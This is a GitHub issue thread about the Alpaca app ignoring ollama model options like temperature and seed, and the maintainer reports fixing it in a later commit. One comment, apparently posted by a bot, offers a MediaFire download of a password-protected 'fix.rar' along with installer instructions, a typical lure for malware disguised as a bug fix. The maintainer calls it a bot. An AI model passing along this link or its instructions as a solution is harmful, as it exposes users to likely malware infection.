### ISSUE TITLE
Model Options like temperature, keep_alive, and seed are ignored

### ISSUE THREAD

**Issue by maximmaxim345** [Jeffser/Alpaca#257]
**Describe the bug**
Options like temperature, keep_alive and seed do not work.

**Expected behavior**
Those options should be passed to ollama's REST API.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jeffser** [comment]
Sorry for the bots, I will fix your issue for the next release

**Comment by Jeffser** [comment]
I fixed it whilst doing the rewrite of the app

https://github.com/Jeffser/Alpaca/commit/4545f5a1b2e0ad943f74595d257bbf7976601ba1
